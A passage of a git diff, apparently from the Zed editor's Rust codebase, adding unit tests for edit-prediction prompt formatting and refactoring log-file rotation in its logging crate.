cursor_offset: usize, - ) -> String { - let mut section = String::new(); - let path_str = path.to_string_lossy(); - write!(section, "{}{}\n", FILE_MARKER, path_str).ok(); + #[cfg(test)] + mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn test_apply_variable_edit() { + struct Case { + name: &'static str, + original: &'static str, + model_output: &'static str, + expected: &'static str, + } - 
section.push_str(&context[..editable_range.start]); - section.push_str(START_MARKER); - section.push_str(&context[editable_range.start..cursor_offset]); - section.push_str(CURSOR_MARKER); - section.push_str(&context[cursor_offset..editable_range.end]); - if !section.ends_with('\n') { - section.push('\n'); + let cases = [ + Case { + name: "simple_single_line_replacement", + original: indoc! {" + zero + one + two + three + four + five + "}, + model_output: indoc! {" + two + <|fim_middle|> + THREE + <|fim_suffix|> + four + "}, + expected: indoc! {" + zero + one + two + THREE + four + five + "}, + }, + Case { + name: "multi_line_replacement", + original: indoc! {" + a + b + c + d + e + "}, + model_output: indoc! {" + a + <|fim_middle|> + B + C + D + <|fim_suffix|> + e + "}, + expected: indoc! {" + a + B + C + D + e + "}, + }, + Case { + name: "insertion_between_existing_lines", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + X + <|fim_suffix|> + b + "}, + expected: indoc! {" + a + X + b + c + "}, + }, + Case { + name: "deletion", + original: indoc! {" + a + b + c + d + "}, + model_output: indoc! {" + a + <|fim_middle|> + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + c + d + "}, + }, + Case { + name: "replacement_at_start_no_prefix_context", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + <|fim_middle|> + X + <|fim_suffix|> + b + "}, + expected: indoc! {" + X + b + c + "}, + }, + Case { + name: "replacement_at_end_no_suffix_context", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + b + <|fim_middle|> + Z + <|fim_suffix|> + "}, + expected: indoc! {" + a + b + Z + "}, + }, + Case { + name: "context_with_trailing_newline_is_preserved", + original: indoc! {" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + B + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + B + c + "}, + }, + Case { + name: "cursor_marker_passes_through_untouched", + original: indoc! 
{" + a + b + c + "}, + model_output: indoc! {" + a + <|fim_middle|> + B<|user_cursor|>B + <|fim_suffix|> + c + "}, + expected: indoc! {" + a + B<|user_cursor|>B + c + "}, + }, + Case { + name: "multiple_prefix_context_lines", + original: indoc! {" + a + b + c + d + e + "}, + model_output: indoc! {" + b + c + <|fim_middle|> + D + <|fim_suffix|> + e + "}, + expected: indoc! {" + a + b + c + D + e + "}, + }, + ]; + + for case in cases { + let (edit_range, replacement) = + apply_variable_edit(case.original, case.model_output).unwrap(); + let mut edited = case.original.to_string(); + edited.replace_range(edit_range, &replacement); + assert_eq!(edited, case.expected, "{}", case.name); + } + } + + #[test] + fn test_patch_to_variable_edit() { + struct Case { + name: &'static str, + old: &'static str, + patch: &'static str, + cursor_offset: Option, + expected_variable_edit: &'static str, + expected_after_apply: &'static str, + } + + let cases = [ + Case { + name: "simple_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + THREE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + THREE + four + five + "}, + }, + Case { + name: "insertion", + old: indoc! {" + a + b + c + d + e + "}, + patch: indoc! {" + @@ -2,0 +3,1 @@ + b + +X + c + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + a + b + <|fim_middle|> + X + <|fim_suffix|> + c + d + "}, + expected_after_apply: indoc! {" + a + b + X + c + d + e + "}, + }, + Case { + name: "deletion", + old: indoc! {" + a + b + c + d + e + "}, + patch: indoc! {" + @@ -2,3 +2,2 @@ + b + -c + d + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + a + b + <|fim_middle|> + <|fim_suffix|> + d + e + "}, + expected_after_apply: indoc! 
{" + a + b + d + e + "}, + }, + Case { + name: "edit_near_start", + old: indoc! {" + first + second + third + fourth + "}, + patch: indoc! {" + @@ -1,1 +1,1 @@ + -first + +FIRST + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + <|fim_middle|> + FIRST + <|fim_suffix|> + second + third + "}, + expected_after_apply: indoc! {" + FIRST + second + third + fourth + "}, + }, + Case { + name: "edit_near_end", + old: indoc! {" + first + second + third + fourth + "}, + patch: indoc! {" + @@ -4,1 +4,1 @@ + -fourth + +FOURTH + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + second + third + <|fim_middle|> + FOURTH + <|fim_suffix|> + "}, + expected_after_apply: indoc! {" + first + second + third + FOURTH + "}, + }, + Case { + name: "cursor_at_start_of_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: Some(4), + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + <|user_cursor|>THREE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + <|user_cursor|>THREE + four + five + "}, + }, + Case { + name: "cursor_in_middle_of_replacement", + old: indoc! {" + zero + one + two + three + four + five + "}, + patch: indoc! {" + @@ -3,3 +3,3 @@ + two + -three + +THREE + four + "}, + cursor_offset: Some(6), + expected_variable_edit: indoc! {" + one + two + <|fim_middle|> + TH<|user_cursor|>REE + <|fim_suffix|> + four + five + "}, + expected_after_apply: indoc! {" + zero + one + two + TH<|user_cursor|>REE + four + five + "}, + }, + Case { + name: "expands_context_when_two_lines_not_unique_before_and_after", + old: indoc! {" + one + a + b + c + d + two + a + b + c + d + three + a + b + c + d + four + "}, + patch: indoc! {" + @@ -4,5 +4,5 @@ + two + a + b + -c + +C + d + three + "}, + cursor_offset: None, + expected_variable_edit: indoc! 
{" + two + a + b + <|fim_middle|> + C + <|fim_suffix|> + d + three + "}, + expected_after_apply: indoc! {" + one + a + b + c + d + two + a + b + C + d + three + a + b + c + d + four + "}, + }, + Case { + name: "expands_context_when_two_lines_not_unique_before_and_after", + old: indoc! {" + { + { + one(); + } + } + { + { + two(); + } + } + { + { + three(); + } + } + { + { + four(); + } + } + "}, + patch: indoc! {" + @@ -4,5 +4,5 @@ + { + - two(); + + TWO(); + } + "}, + cursor_offset: None, + expected_variable_edit: indoc! {" + one(); + } + } + { + { + <|fim_middle|> + TWO(); + <|fim_suffix|> + } + } + { + { + three(); + "}, + expected_after_apply: indoc! {" + { + { + one(); + } + } + { + { + TWO(); + } + } + { + { + three(); + } + } + { + { + four(); + } + } + "}, + }, + ]; + + for case in cases { + let output = + patch_to_variable_edit_output(case.old, case.patch, case.cursor_offset) + .unwrap_or_else(|error| { + panic!("failed converting patch for {}: {error}", case.name) + }); + assert_eq!( + output, case.expected_variable_edit, + "patch->variable_edit mismatch for {}", + case.name + ); + + let (edit_range, replacement) = apply_variable_edit(case.old, &output) + .unwrap_or_else(|error| { + panic!("failed applying variable_edit for {}: {error}", case.name) + }); + let mut edited_by_variable_edit = case.old.to_string(); + edited_by_variable_edit.replace_range(edit_range, &replacement); + assert_eq!( + edited_by_variable_edit, case.expected_after_apply, + "variable_edit apply mismatch for {}", + case.name + ); + + let (expected_edit_range, expected_replacement) = + apply_variable_edit(case.old, case.expected_variable_edit).unwrap_or_else( + |error| { + panic!( + "failed applying expected variable_edit for {}: {error}", + case.name + ) + }, + ); + let mut edited_by_expected_variable_edit = case.old.to_string(); + edited_by_expected_variable_edit + .replace_range(expected_edit_range, &expected_replacement); + assert_eq!( + edited_by_expected_variable_edit, 
case.expected_after_apply, + "expected variable_edit apply mismatch for {}", + case.name + ); + } + } + + #[test] + fn test_write_cursor_excerpt_section() { + let path = Path::new("test.rs"); + let context = "fn main() {\n hello();\n}\n"; + let cursor_offset = 17; + let mut prompt = String::new(); + write_cursor_excerpt_section(&mut prompt, path, context, cursor_offset); + assert_eq!( + prompt, + "<|file_sep|>test.rs\nfn main() {\n h<|user_cursor|>ello();\n}\n<|fim_prefix|>\n" + ); } - section.push_str(SEPARATOR); - section } } @@ -995,7 +4320,13 @@ pub mod zeta1 { /// Formats events in zeta1 style (oldest first). fn format_zeta1_events(events: &[Arc]) -> String { let mut result = String::new(); - for event in events { + for event in + events + .iter() + .skip(events.len().saturating_sub(max_edit_event_count_for_format( + &ZetaFormat::V0114180EditableRegion, + ))) + { let event_string = format_zeta1_event(event); if event_string.is_empty() { continue; @@ -1153,18 +4484,60 @@ mod tests { events: Vec, related_files: Vec, ) -> ZetaPromptInput { + let context_range = 0..cursor_excerpt.len(); ZetaPromptInput { cursor_path: Path::new("test.rs").into(), cursor_excerpt: cursor_excerpt.into(), - editable_range_in_excerpt: editable_range, cursor_offset_in_excerpt: cursor_offset, excerpt_start_row: None, events: events.into_iter().map(Arc::new).collect(), - related_files, - excerpt_ranges: None, - preferred_model: None, + related_files: Some(related_files), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range, + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, + in_open_source_repo: false, + can_collect_data: false, + repo_url: None, + } + } + + fn make_input_with_context_range( + 
excerpt: &str, + editable_range: Range, + context_range: Range, + cursor_offset: usize, + ) -> ZetaPromptInput { + ZetaPromptInput { + cursor_path: Path::new("test.rs").into(), + cursor_excerpt: excerpt.into(), + cursor_offset_in_excerpt: cursor_offset, + excerpt_start_row: None, + events: vec![], + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range, + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, } } @@ -1191,8 +4564,12 @@ mod tests { } } - fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0114180EditableRegion, max_tokens) + fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> Option { + format_prompt_with_budget_for_format(input, ZetaFormat::V0114180EditableRegion, max_tokens) + } + + fn budget_with_margin(requested_tokens: usize) -> usize { + ((requested_tokens as f64) / 0.9).ceil() as usize } #[test] @@ -1206,7 +4583,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>related.rs fn helper() {} @@ -1225,6 +4602,7 @@ mod tests { suffix <|fim_middle|>updated "#} + .to_string() ); } @@ -1236,18 +4614,18 @@ mod tests { 2, vec![make_event("a.rs", "-x\n+y\n")], vec![ - make_related_file("r1.rs", "a\n"), - make_related_file("r2.rs", "b\n"), + make_related_file("r1.rs", "aaaaaaa\n"), + make_related_file("r2.rs", "bbbbbbb\n"), ], ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! 
{r#" <|file_sep|>r1.rs - a + aaaaaaa <|file_sep|>r2.rs - b + bbbbbbb <|file_sep|>edit history --- a/a.rs +++ b/a.rs @@ -1260,15 +4638,18 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 50), - indoc! {r#" - <|file_sep|>r1.rs - a - <|file_sep|>r2.rs - b + format_with_budget(&input, budget_with_margin(55)), + Some( + indoc! {r#" + <|file_sep|>edit history + --- a/a.rs + +++ b/a.rs + -x + +y <|file_sep|>test.rs <|fim_prefix|> <|fim_middle|>current @@ -1276,6 +4657,8 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() + ) ); } @@ -1311,7 +4694,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>big.rs first excerpt @@ -1326,10 +4709,11 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 50), + format_with_budget(&input, budget_with_margin(50)).unwrap(), indoc! {r#" <|file_sep|>big.rs first excerpt @@ -1341,6 +4725,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1379,7 +4764,7 @@ mod tests { // With large budget, both files included; rendered in stable lexicographic order. assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>file_a.rs low priority content @@ -1392,6 +4777,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); // With tight budget, only file_b (lower order) fits. @@ -1399,7 +4785,7 @@ mod tests { // file_b header (7) + excerpt (7) = 14 tokens, which fits. // file_a would need another 14 tokens, which doesn't fit. assert_eq!( - format_with_budget(&input, 52), + format_with_budget(&input, budget_with_margin(52)).unwrap(), indoc! 
{r#" <|file_sep|>file_b.rs high priority content @@ -1410,6 +4796,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1451,7 +4838,7 @@ mod tests { // With large budget, all three excerpts included. assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>mod.rs mod header @@ -1466,11 +4853,12 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); // With tight budget, only order<=1 excerpts included (header + important fn). assert_eq!( - format_with_budget(&input, 55), + format_with_budget(&input, budget_with_margin(55)).unwrap(), indoc! {r#" <|file_sep|>mod.rs mod header @@ -1484,6 +4872,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1498,7 +4887,7 @@ mod tests { ); assert_eq!( - format_with_budget(&input, 10000), + format_with_budget(&input, 10000).unwrap(), indoc! {r#" <|file_sep|>edit history --- a/old.rs @@ -1514,10 +4903,11 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); assert_eq!( - format_with_budget(&input, 55), + format_with_budget(&input, 60).unwrap(), indoc! {r#" <|file_sep|>edit history --- a/new.rs @@ -1530,6 +4920,7 @@ mod tests { <|fim_suffix|> <|fim_middle|>updated "#} + .to_string() ); } @@ -1543,25 +4934,19 @@ mod tests { vec![make_related_file("related.rs", "helper\n")], ); - assert_eq!( - format_with_budget(&input, 30), - indoc! 
{r#" - <|file_sep|>test.rs - <|fim_prefix|> - <|fim_middle|>current - fn <|user_cursor|>main() {} - <|fim_suffix|> - <|fim_middle|>updated - "#} - ); + assert!(format_with_budget(&input, 30).is_none()) } + #[track_caller] fn format_seed_coder(input: &ZetaPromptInput) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0211SeedCoder, 10000) + format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, 10000) + .expect("seed coder prompt formatting should succeed") } + #[track_caller] fn format_seed_coder_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String { - format_zeta_prompt_with_budget(input, ZetaFormat::V0211SeedCoder, max_tokens) + format_prompt_with_budget_for_format(input, ZetaFormat::V0211SeedCoder, max_tokens) + .expect("seed coder prompt formatting should succeed") } #[test] @@ -1597,6 +4982,34 @@ mod tests { ); } + #[test] + fn test_v0317_formats_prompt_with_many_related_files() { + let related_files = (0..900) + .map(|index| { + make_related_file( + &format!("related_{index}.rs"), + "fn helper() {\n let value = 1;\n}\n", + ) + }) + .collect(); + + let input = make_input( + "code", + 0..4, + 2, + vec![make_event("a.rs", "-x\n+y\n")], + related_files, + ); + + let prompt = + format_prompt_with_budget_for_format(&input, ZetaFormat::V0317SeedMultiRegions, 4096); + + assert!(prompt.is_some()); + let prompt = prompt.expect("v0317 should produce a prompt under high related-file count"); + assert!(prompt.contains("test.rs")); + assert!(prompt.contains(CURSOR_MARKER)); + } + #[test] fn test_seed_coder_no_context() { let input = make_input("before\nmiddle\nafter", 7..13, 10, vec![], vec![]); @@ -1646,17 +5059,22 @@ mod tests { <[fim-middle]>"#} ); - // With tight budget, context is dropped but cursor section remains assert_eq!( - format_seed_coder_with_budget(&input, 30), + format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 24), + None + ); + + assert_eq!( + format_seed_coder_with_budget(&input, 40), 
indoc! {r#" <[fim-suffix]> <[fim-prefix]>test.rs <<<<<<< CURRENT co<|user_cursor|>de ======= - <[fim-middle]>"#} - ); + <[fim-middle]>"# + } + ) } #[test] @@ -1707,36 +5125,20 @@ mod tests { <[fim-middle]>"#} ); - // With tight budget, only high_prio included. - // Cursor sections cost 25 tokens, so budget 44 leaves 19 for related files. - // high_prio header (7) + excerpt (3) = 10, fits. low_prio would add 10 more = 20 > 19. - assert_eq!( - format_seed_coder_with_budget(&input, 44), - indoc! {r#" - <[fim-suffix]> - <[fim-prefix]>high_prio.rs - high prio - - test.rs - <<<<<<< CURRENT - co<|user_cursor|>de - ======= - <[fim-middle]>"#} - ); - } - - #[test] - fn test_seed_coder_clean_output() { - let output_with_marker = "new code\n>>>>>>> UPDATED\n"; - let output_without_marker = "new code\n"; - - assert_eq!( - clean_zeta2_model_output(output_with_marker, ZetaFormat::V0211SeedCoder), - "new code\n" - ); + // With tight budget under the generic heuristic, context is dropped but the + // minimal cursor section still fits. assert_eq!( - clean_zeta2_model_output(output_without_marker, ZetaFormat::V0211SeedCoder), - "new code\n" + format_prompt_with_budget_for_format(&input, ZetaFormat::V0211SeedCoder, 44), + Some( + indoc! 
{r#" + <[fim-suffix]> + <[fim-prefix]>test.rs + <<<<<<< CURRENT + co<|user_cursor|>de + ======= + <[fim-middle]>"#} + .to_string() + ) ); } @@ -1746,15 +5148,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("src/main.rs").into(), cursor_excerpt: excerpt.into(), - editable_range_in_excerpt: 15..41, cursor_offset_in_excerpt: 30, excerpt_start_row: Some(0), events: vec![Arc::new(make_event("other.rs", "-old\n+new\n"))], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: 15..41, + editable_180: 15..41, + editable_350: 15..41, + editable_150_context_350: 0..excerpt.len(), + editable_180_context_350: 0..excerpt.len(), + editable_350_context_150: 0..excerpt.len(), + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, 15..41, 0..excerpt.len()); @@ -1801,15 +5213,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("src/main.rs").into(), cursor_excerpt: excerpt.into(), - editable_range_in_excerpt: 0..28, cursor_offset_in_excerpt: 15, excerpt_start_row: Some(10), events: vec![], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: 0..28, + editable_180: 0..28, + editable_350: 0..28, + editable_150_context_350: 0..28, + editable_180_context_350: 0..28, + editable_350_context_150: 0..28, + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, 0..28, 0..28); @@ -1851,15 +5273,25 @@ mod tests { let input = ZetaPromptInput { cursor_path: Path::new("test.rs").into(), cursor_excerpt: 
excerpt.into(), - editable_range_in_excerpt: editable_range.clone(), cursor_offset_in_excerpt: 25, excerpt_start_row: Some(0), events: vec![], - related_files: vec![], - excerpt_ranges: None, - preferred_model: None, + related_files: Some(vec![]), + active_buffer_diagnostics: vec![], + excerpt_ranges: ExcerptRanges { + editable_150: editable_range.clone(), + editable_180: editable_range.clone(), + editable_350: editable_range.clone(), + editable_150_context_350: context_range.clone(), + editable_180_context_350: context_range.clone(), + editable_350_context_150: context_range.clone(), + ..Default::default() + }, + syntax_ranges: None, + experiment: None, in_open_source_repo: false, can_collect_data: false, + repo_url: None, }; let prompt = zeta1::format_zeta1_from_input(&input, editable_range, context_range); @@ -1895,6 +5327,87 @@ mod tests { ); } + #[test] + fn test_max_event_count() { + fn make_numbered_event(index: usize) -> Event { + return make_event( + &format!("event-{index}.rs"), + &format!("-old-{index}\n+new-{index}\n"), + ); + } + let input = make_input( + "x", + 0..1, + 0, + (0..3).map(make_numbered_event).collect(), + vec![], + ); + + let edit_history_section = format_edit_history_within_budget( + &input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 5, + ); + + assert_eq!( + &edit_history_section, + indoc!( + " + <|file_sep|>edit history + --- a/event-0.rs + +++ b/event-0.rs + -old-0 + +new-0 + --- a/event-1.rs + +++ b/event-1.rs + -old-1 + +new-1 + --- a/event-2.rs + +++ b/event-2.rs + -old-2 + +new-2 + " + ) + ); + + let edit_history_section = format_edit_history_within_budget( + &input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 2, + ); + + assert_eq!( + &edit_history_section, + indoc!( + " + <|file_sep|>edit history + --- a/event-1.rs + +++ b/event-1.rs + -old-1 + +new-1 + --- a/event-2.rs + +++ b/event-2.rs + -old-2 + +new-2 + " + ) + ); + + let edit_history_section = format_edit_history_within_budget( + 
&input.events, + "<|file_sep|>", + "edit history", + usize::MAX, + 0, + ); + + assert_eq!(&edit_history_section, ""); + } + #[test] fn test_clean_zeta1_model_output_basic() { let output = indoc! {" @@ -1939,4 +5452,111 @@ mod tests { let cleaned = zeta1::clean_zeta1_model_output(output).unwrap(); assert_eq!(cleaned, ""); } + + fn apply_edit(excerpt: &str, parsed_output: &ParsedOutput) -> String { + let mut result = excerpt.to_string(); + result.replace_range( + parsed_output.range_in_excerpt.clone(), + &parsed_output.new_editable_region, + ); + result + } + + #[test] + fn test_parse_zeta2_model_output() { + let excerpt = "before ctx\nctx start\neditable old\nctx end\nafter ctx\n"; + let context_start = excerpt.find("ctx start").unwrap(); + let context_end = excerpt.find("after ctx").unwrap(); + let editable_start = excerpt.find("editable old").unwrap(); + let editable_end = editable_start + "editable old\n".len(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + context_start..context_end, + editable_start, + ); + + let output = parse_zeta2_model_output( + "editable new\n>>>>>>> UPDATED\n", + ZetaFormat::V0131GitMergeMarkersPrefix, + &input, + ) + .unwrap(); + + assert_eq!( + apply_edit(excerpt, &output), + "before ctx\nctx start\neditable new\nctx end\nafter ctx\n" + ); + } + + #[test] + fn test_parse_zeta2_model_output_identity() { + let excerpt = "aaa\nbbb\nccc\nddd\neee\n"; + let editable_start = excerpt.find("bbb").unwrap(); + let editable_end = excerpt.find("ddd").unwrap(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + 0..excerpt.len(), + editable_start, + ); + + let format = ZetaFormat::V0131GitMergeMarkersPrefix; + let output = + parse_zeta2_model_output("bbb\nccc\n>>>>>>> UPDATED\n", format, &input).unwrap(); + + assert_eq!(apply_edit(excerpt, &output), excerpt); + } + + #[test] + fn test_parse_zeta2_model_output_strips_end_marker() { + let excerpt = "hello\nworld\n"; + 
let input = make_input_with_context_range(excerpt, 0..excerpt.len(), 0..excerpt.len(), 0); + + let format = ZetaFormat::V0131GitMergeMarkersPrefix; + let output1 = + parse_zeta2_model_output("new content\n>>>>>>> UPDATED\n", format, &input).unwrap(); + let output2 = parse_zeta2_model_output("new content\n", format, &input).unwrap(); + + assert_eq!(apply_edit(excerpt, &output1), apply_edit(excerpt, &output2)); + assert_eq!(apply_edit(excerpt, &output1), "new content\n"); + } + + #[test] + fn test_parsed_output_to_patch_round_trips_through_udiff_application() { + let excerpt = "before ctx\nctx start\neditable old\nctx end\nafter ctx\n"; + let context_start = excerpt.find("ctx start").unwrap(); + let context_end = excerpt.find("after ctx").unwrap(); + let editable_start = excerpt.find("editable old").unwrap(); + let editable_end = editable_start + "editable old\n".len(); + let input = make_input_with_context_range( + excerpt, + editable_start..editable_end, + context_start..context_end, + editable_start, + ); + + let parsed = parse_zeta2_model_output( + "editable new\n>>>>>>> UPDATED\n", + ZetaFormat::V0131GitMergeMarkersPrefix, + &input, + ) + .unwrap(); + let expected = apply_edit(excerpt, &parsed); + let patch = parsed_output_to_patch(&input, parsed).unwrap(); + let patched = udiff::apply_diff_to_string(&patch, excerpt).unwrap(); + + assert_eq!(patched, expected); + } + + #[test] + fn test_special_tokens_not_triggered_by_comment_separator() { + // Regression test for https://github.com/zed-industries/zed/issues/52489 + let excerpt = "fn main() {\n // =======\n println!(\"hello\");\n}\n"; + let input = make_input(excerpt, 0..excerpt.len(), 0, vec![], vec![]); + assert!( + !prompt_input_contains_special_tokens(&input, ZetaFormat::V0131GitMergeMarkersPrefix), + "comment containing ======= should not trigger special token detection" + ); + } } diff --git a/crates/zlog/src/sink.rs b/crates/zlog/src/sink.rs index 
07e87be1b071f2538e716bb8fd2b692527363fc4..2aea9c957756011689d81618eedcf22979ea2077 100644 --- a/crates/zlog/src/sink.rs +++ b/crates/zlog/src/sink.rs @@ -56,10 +56,9 @@ pub fn init_output_file( path: &'static PathBuf, path_rotate: Option<&'static PathBuf>, ) -> io::Result<()> { - let mut file = std::fs::OpenOptions::new() - .create(true) - .append(true) - .open(path)?; + let mut enabled_sinks_file = ENABLED_SINKS_FILE + .try_lock() + .expect("Log file lock is available during init"); SINK_FILE_PATH .set(path) @@ -70,22 +69,30 @@ pub fn init_output_file( .expect("Init file output should only be called once"); } - let mut enabled_sinks_file = ENABLED_SINKS_FILE - .try_lock() - .expect("Log file lock is available during init"); - - let size_bytes = file.metadata().map_or(0, |metadata| metadata.len()); - if size_bytes >= SINK_FILE_SIZE_BYTES_MAX { - rotate_log_file(&mut file, Some(path), path_rotate, &SINK_FILE_SIZE_BYTES); - } else { - SINK_FILE_SIZE_BYTES.store(size_bytes, Ordering::Release); - } - + let file = open_or_create_log_file(path, path_rotate, SINK_FILE_SIZE_BYTES_MAX)?; + SINK_FILE_SIZE_BYTES.store(file.metadata().map_or(0, |m| m.len()), Ordering::Release); *enabled_sinks_file = Some(file); Ok(()) } +fn open_or_create_log_file( + path: &PathBuf, + path_rotate: Option<&PathBuf>, + sink_file_size_bytes_max: u64, +) -> Result { + let size_bytes = std::fs::metadata(path).map(|metadata| metadata.len()); + match size_bytes { + Ok(size_bytes) if size_bytes >= sink_file_size_bytes_max => { + rotate_log_file(Some(path), path_rotate).map(|it| it.unwrap()) + } + _ => std::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path), + } +} + const LEVEL_OUTPUT_STRINGS: [&str; 6] = [ " ", // nop: ERROR = 1 "ERROR", // @@ -144,11 +151,11 @@ pub fn submit(mut record: Record) { record.message ); } - let mut file = ENABLED_SINKS_FILE.lock().unwrap_or_else(|handle| { + let mut file_guard = ENABLED_SINKS_FILE.lock().unwrap_or_else(|handle| { 
ENABLED_SINKS_FILE.clear_poison(); handle.into_inner() }); - if let Some(file) = file.as_mut() { + if let Some(file) = file_guard.as_mut() { struct SizedWriter<'a> { file: &'a mut std::fs::File, written: u64, @@ -182,12 +189,16 @@ pub fn submit(mut record: Record) { SINK_FILE_SIZE_BYTES.fetch_add(writer.written, Ordering::AcqRel) + writer.written }; if file_size_bytes > SINK_FILE_SIZE_BYTES_MAX { - rotate_log_file( - file, - SINK_FILE_PATH.get(), - SINK_FILE_PATH_ROTATE.get(), - &SINK_FILE_SIZE_BYTES, - ); + *file_guard = None; + let file = rotate_log_file(SINK_FILE_PATH.get(), SINK_FILE_PATH_ROTATE.get()); + match file { + Ok(Some(file)) => *file_guard = Some(file), + Ok(None) => {} + Err(e) => { + eprintln!("Failed to open log file: {e}") + } + } + SINK_FILE_SIZE_BYTES.store(0, Ordering::Release); } } } @@ -247,19 +258,13 @@ impl std::fmt::Display for SourceFmt<'_> { } fn rotate_log_file( - file: &mut fs::File, path: Option, path_rotate: Option, - atomic_size: &AtomicU64, -) where +) -> std::io::Result> +where PathRef: AsRef, { - if let Err(err) = file.flush() { - eprintln!( - "Failed to flush log file before rotating, some logs may be lost: {}", - err - ); - } + let path = path.as_ref().map(PathRef::as_ref); let rotation_error = match (path, path_rotate) { (Some(_), None) => Some(anyhow::anyhow!("No rotation log file path configured")), (None, _) => Some(anyhow::anyhow!("No log file path configured")), @@ -270,46 +275,53 @@ fn rotate_log_file( if let Some(err) = rotation_error { eprintln!("Log file rotation failed. 
Truncating log file anyways: {err}",); } - _ = file.set_len(0); - - // SAFETY: It is safe to set size to 0 even if set_len fails as - // according to the documentation, it only fails if: - // - the file is not writeable: should never happen, - // - the size would cause an overflow (implementation specific): 0 should never cause an overflow - atomic_size.store(0, Ordering::Release); + path.map(|path| { + fs::OpenOptions::new() + .create(true) + .write(true) + .truncate(true) + .open(path) + }) + .transpose() } #[cfg(test)] mod tests { + use super::*; #[test] - fn test_rotate_log_file() { + fn test_open_or_create_log_file_rotate() { let temp_dir = tempfile::tempdir().unwrap(); let log_file_path = temp_dir.path().join("log.txt"); let rotation_log_file_path = temp_dir.path().join("log_rotated.txt"); - let mut file = fs::File::create(&log_file_path).unwrap(); let contents = String::from("Hello, world!"); - file.write_all(contents.as_bytes()).unwrap(); + std::fs::write(&log_file_path, &contents).unwrap(); - let size = AtomicU64::new(contents.len() as u64); - - rotate_log_file( - &mut file, - Some(&log_file_path), - Some(&rotation_log_file_path), - &size, - ); + open_or_create_log_file(&log_file_path, Some(&rotation_log_file_path), 4).unwrap(); assert!(log_file_path.exists()); assert_eq!(log_file_path.metadata().unwrap().len(), 0); assert!(rotation_log_file_path.exists()); - assert_eq!( - std::fs::read_to_string(&rotation_log_file_path).unwrap(), - contents, - ); - 